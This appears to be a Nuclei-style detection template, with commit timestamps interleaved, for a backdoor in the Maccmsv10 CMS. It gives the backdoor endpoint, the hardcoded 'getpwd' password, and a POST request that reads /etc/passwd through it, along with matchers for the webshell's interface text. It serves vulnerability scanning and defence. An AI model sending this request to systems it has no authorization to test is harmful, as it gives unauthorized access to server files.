2021-04-09 22:00:22 +00:00
id : maccmsv10-backdoor
2022-04-22 10:38:41 +00:00
2021-04-09 22:00:22 +00:00
info :
2022-05-30 13:48:06 +00:00
name : Maccmsv10 - Backdoor Detection
2021-04-09 22:00:22 +00:00
author : princechaddha
severity : critical
2022-05-30 13:48:06 +00:00
description : Maccmsv10 contains a backdoor which can be exploited by remote attackers. The backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'.
reference :
- https://github.com/chaitin/xray/blob/master/pocs/maccmsv10-backdoor.yml
2021-04-09 22:00:22 +00:00
tags : maccmsv10,rce
requests :
- method : POST
path :
- "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"
body : "getpwd=WorldFilledWithLove"
headers :
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : word
words :
- "扫描后门"
- "反弹端口"
- "文件管理"
condition : and
part : body
- type : status
status :
- 200
2022-05-30 13:48:06 +00:00
# Enhanced by mp on 2022/05/30